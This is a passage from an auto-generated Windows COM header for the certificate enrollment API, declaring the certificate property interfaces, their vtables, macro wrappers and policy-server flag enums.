            ICertPropertyEnrollment * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in BSTR strCADnsName,
            /* [in] */ __RPC__in BSTR strCAName,
            /* [defaultvalue][in] */ __RPC__in BSTR strFriendlyName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CADnsName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyEnrollmentVtbl;

    interface ICertPropertyEnrollment
    {
        CONST_VTBL struct ICertPropertyEnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyEnrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyEnrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyEnrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyEnrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyEnrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyEnrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyEnrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyEnrollment_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollment_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyEnrollment_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyEnrollment_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyEnrollment_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyEnrollment_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollment_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyEnrollment_Initialize(This,RequestId,strCADnsName,strCAName,strFriendlyName)	\
    ( (This)->lpVtbl -> Initialize(This,RequestId,strCADnsName,strCAName,strFriendlyName) ) 

#define ICertPropertyEnrollment_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define ICertPropertyEnrollment_get_CADnsName(This,pValue)	\
    ( (This)->lpVtbl -> get_CADnsName(This,pValue) ) 

#define ICertPropertyEnrollment_get_CAName(This,pValue)	\
    ( (This)->lpVtbl -> get_CAName(This,pValue) ) 

#define ICertPropertyEnrollment_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyEnrollment_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyRenewal_INTERFACE_DEFINED__
#define __ICertPropertyRenewal_INTERFACE_DEFINED__

/* interface ICertPropertyRenewal */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyRenewal;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33a-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyRenewal : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificateHash( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Renewal( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyRenewalVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyRenewal * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyRenewal * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyRenewal * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificateHash )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Renewal )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyRenewalVtbl;

    interface ICertPropertyRenewal
    {
        CONST_VTBL struct ICertPropertyRenewalVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyRenewal_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyRenewal_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyRenewal_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyRenewal_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyRenewal_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyRenewal_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyRenewal_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyRenewal_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyRenewal_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyRenewal_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyRenewal_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyRenewal_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyRenewal_Initialize(This,Encoding,strRenewalValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strRenewalValue) ) 

#define ICertPropertyRenewal_InitializeFromCertificateHash(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificateHash(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_get_Renewal(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Renewal(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyRenewal_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__
#define __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__

/* interface ICertPropertyArchivedKeyHash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyArchivedKeyHash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33b-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyArchivedKeyHash : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strArchivedKeyHashValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ArchivedKeyHash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyArchivedKeyHashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyArchivedKeyHash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyArchivedKeyHash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyArchivedKeyHash * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strArchivedKeyHashValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivedKeyHash )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyArchivedKeyHashVtbl;

    interface ICertPropertyArchivedKeyHash
    {
        CONST_VTBL struct ICertPropertyArchivedKeyHashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyArchivedKeyHash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyArchivedKeyHash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyArchivedKeyHash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyArchivedKeyHash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyArchivedKeyHash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyArchivedKeyHash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyArchivedKeyHash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyArchivedKeyHash_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchivedKeyHash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyArchivedKeyHash_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyArchivedKeyHash_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyArchivedKeyHash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyArchivedKeyHash_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchivedKeyHash_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyArchivedKeyHash_Initialize(This,Encoding,strArchivedKeyHashValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strArchivedKeyHashValue) ) 

#define ICertPropertyArchivedKeyHash_get_ArchivedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_ArchivedKeyHash(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0058 */
/* [local] */ 

typedef 
enum EnrollmentPolicyServerPropertyFlags
    {	DefaultNone	= 0,
	DefaultPolicyServer	= 0x1
    } 	EnrollmentPolicyServerPropertyFlags;

typedef 
enum PolicyServerUrlFlags
    {	PsfNone	= 0,
	PsfLocationGroupPolicy	= 1,
	PsfLocationRegistry	= 2,
	PsfUseClientId	= 4,
	PsfAutoEnrollmentEnabled	= 16,
	PsfAllowUnTrustedCA	= 32
    } 	PolicyServerUrlFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0058_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0058_v0_0_s_ifspec;

#ifndef __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__
#define __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__

/* interface ICertPropertyEnrollmentPolicyServer */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyEnrollmentPolicyServer;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab34a-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyEnrollmentPolicyServer : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EnrollmentPolicyServerPropertyFlags PropertyFlags,
            /* [in] */ X509EnrollmentAuthFlags AuthFlags,
            /* [in] */ X509EnrollmentAuthFlags EnrollmentServerAuthFlags,
            /* [in] */ PolicyServerUrlFlags UrlFlags,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strUrl,
            /* [in] */ __RPC__in BSTR strId,
            /* [in] */ __RPC__in BSTR strEnrollmentServerUrl) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEnrollmentServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPropertyFlags( 
            /* [retval][out] */ __RPC__out EnrollmentPolicyServerPropertyFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetUrlFlags( 
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAuthentication( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEnrollmentServerAuthentication( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyEnrollmentPolicyServerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EnrollmentPolicyServerPropertyFlags PropertyFlags,
            /* [in] */ X509EnrollmentAuthFlags AuthFlags,
            /* [in] */ X509EnrollmentAuthFlags EnrollmentServerAuthFlags,
            /* [in] */ PolicyServerUrlFlags UrlFlags,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strUrl,
